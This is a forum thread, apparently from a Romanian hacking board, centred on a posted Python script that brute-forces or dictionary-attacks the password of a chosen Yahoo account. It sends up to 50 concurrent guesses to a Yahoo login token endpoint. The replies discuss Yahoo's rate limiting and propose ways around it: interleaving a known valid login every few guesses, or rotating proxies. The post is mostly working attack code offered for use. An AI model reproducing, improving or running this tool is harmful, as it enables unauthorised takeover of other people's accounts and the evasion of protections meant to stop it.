Jump to content
cmiN

[Python] Yahoo Brute Force & Dictionary Attack (console) [cmiN]

Recommended Posts

Posted

#! /usr/bin/env python3.1
# 09.09.2009 <> 20.09.2009 | cmiN
# Yahoo Brute Force & Dictionary Attack (console)


import sys, threading, urllib.request


class YBFDA:

def __init__(self, args):
usage = """\t\t Yahoo Bf & Da 1.0

\t Usage: YahooBfDa.py ymsgrid mode [charset_mode string_range] [words_file] timeout

Where ymsgrid is the Yahoo ID
mode is the attack mode:
BF - Brute Force
DA - Dictionary Attack
charset_mode sets the characters to use:
la - loweralpha
ua - upperalpha
d - digits
o - others
string_range is the length of the string from x to y:
1 - min
9 - max
words_file is a text file containing the passwords
timeout is a float (seconds)

* Note that arguments in brackets may be missing and:
charset_mode + string_range are used with "BF" mode
words_file is used with "DA" mode

\t Example: YahooBfDa.py cmin764 BF lad 6-9 1
\t YahooBfDa.py cmin764 DA C:\\list.txt 0.1"""
if len(args) in range(5, 7):
try:
self.ymsgrid = args[1]
self.mode = args[2]
self.url = "https://login.yahoo.com/config/pwtoken_get?src=ymsgr&login=" + self.ymsgrid + "&passwd="
self.outstr = None
if self.mode == "BF":
self.charset = list()
self.strran = None
first, last = int(args[4].split("-")[0]), int(args[4].split("-")[1])
if first <= last:
self.strran = range(first, last + 1, 1)
else:
self.strran = range(first, last - 1, -1)
if "la" in args[3]:
self.charset.extend(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'])
if "ua" in args[3]:
self.charset.extend(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
if "d" in args[3]:
self.charset.extend(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'])
if "o" in args[3]:
self.charset.extend(['`', '~', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '-', '_', '=', '+', '|', '[', '{', ']', '}', ';', ':', "'", '"', ',', '<', '.', '>', '/', '?', ' '])
self.timeout = float(args[5])
elif self.mode == "DA":
self.infile = args[3]
self.timeout = float(args[4])
else:
raise Exception("invalid mode")
self.start()
except Exception as message:
print("An error occurred: {}".format(message))
except:
print("Unknown error.")
else:
print(usage)
input()

def start(self):
MAX_THREADS = 50
if self.mode == "BF":
for strlen in self.strran:
if strlen == 1:
generator = ("".join([word1]) for word1 in self.charset)
elif strlen == 2:
generator = ("".join([word1, word2]) for word1 in self.charset for word2 in self.charset)
elif strlen == 3:
generator = ("".join([word1, word2, word3]) for word1 in self.charset for word2 in self.charset for word3 in self.charset)
elif strlen == 4:
generator = ("".join([word1, word2, word3, word4]) for word1 in self.charset for word2 in self.charset for word3 in self.charset for word4 in self.charset)
elif strlen == 5:
generator = ("".join([word1, word2, word3, word4, word5]) for word1 in self.charset for word2 in self.charset for word3 in self.charset for word4 in self.charset for word5 in self.charset)
elif strlen == 6:
generator = ("".join([word1, word2, word3, word4, word5, word6]) for word1 in self.charset for word2 in self.charset for word3 in self.charset for word4 in self.charset for word5 in self.charset for word6 in self.charset)
elif strlen == 7:
generator = ("".join([word1, word2, word3, word4, word5, word6, word7]) for word1 in self.charset for word2 in self.charset for word3 in self.charset for word4 in self.charset for word5 in self.charset for word6 in self.charset for word7 in self.charset)
elif strlen == 8:
generator = ("".join([word1, word2, word3, word4, word5, word6, word7, word8]) for word1 in self.charset for word2 in self.charset for word3 in self.charset for word4 in self.charset for word5 in self.charset for word6 in self.charset for word7 in self.charset for word8 in self.charset)
elif strlen == 9:
generator = ("".join([word1, word2, word3, word4, word5, word6, word7, word8, word9]) for word1 in self.charset for word2 in self.charset for word3 in self.charset for word4 in self.charset for word5 in self.charset for word6 in self.charset for word7 in self.charset for word8 in self.charset for word9 in self.charset)
for string in generator:
while threading.activeCount() > MAX_THREADS:
pass
Scan(self, string).start()
if not self.outstr is None:
break
if not self.outstr is None:
break
else:
with open(self.infile, "r") as f:
for string in f:
while threading.activeCount() > MAX_THREADS:
pass
Scan(self, string).start()
if not self.outstr is None:
break
while threading.activeCount() > 1:
pass
if self.outstr is None:
print("The program didn't find the password.")
else:
print("The program found the password: {}".format(self.outstr))


class Scan(threading.Thread):

def __init__(self, app, string):
threading.Thread.__init__(self)
self.app = app
self.string = string

def run(self):
try:
with urllib.request.urlopen("".join([self.app.url, self.string.strip("\n")]), timeout=self.app.timeout) as u:
x = int(str(u.read(1), encoding="utf-8"))
if x == 0:
self.app.outstr = self.string.strip("\n")
except:
print("Timed out !")


if __name__ == "__main__":
YBFDA(sys.argv)

Python 3.1.1 -> Python Programming Language -- Official Website

El merge perfect, dar vad ca de la un timp citeste rezultate aiurea desi informatiile sunt corecte. Dupa ce se incearca o parola de mai multe ori se prind si chiar daca bagi parola corecta ei trimit raspuns ca e gresita.

Posted

Si pe langa asta puneam optiunea de a incerca fiecare id sau fiecare parola sau fiecare combinatie pe o lista de proxy-uri, puneam un status si in timp real sa poti vedea ce id-uri sunt incarcate, care sunt terminate si daca exista rezultate pozitive, iar daca treaba mergea bine mai bagam o clasa cu un GUI si scoteam un soft adevarat, dar din start conceptul e prost pentru ca pornesc de la link-ul:

https://login.yahoo.com/config/pwtoken_get?src=ymsgr&login=[USER]&passwd=[PASSWORD]

Posted

mai simplu, fara proxy: incearca 5 parole, apoi un cont bun+parola buna. Apoi urmatoarele 5 parole si tot asa. Am testat cu un php metoda asta tot in pwtoken. Daca nu merge abia atunci motivul ar putea fi rapiditatea scriptului python si atunci iti ramane solutia cu proxy.

Posted

Am vazut ca face niste faze urate, cand primeste string-uri gen: aaa, aab, aac si nu imi dau seama o fi ceva de siguranta la ei, ca la fel cum as trimite string-uri diferite in masa cate 50 deodata, trimit si string-uri de astea gen rotitele de la kilometraj, dar se comporta aiurea, asa ca nu are rost. Oricum cand vrei ceva pentru viteza si optimizari etc C castiga nu Python, desi prin Python te salvezi cu lunile de zile in unele proiecte mai ales daca sunt complicate.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...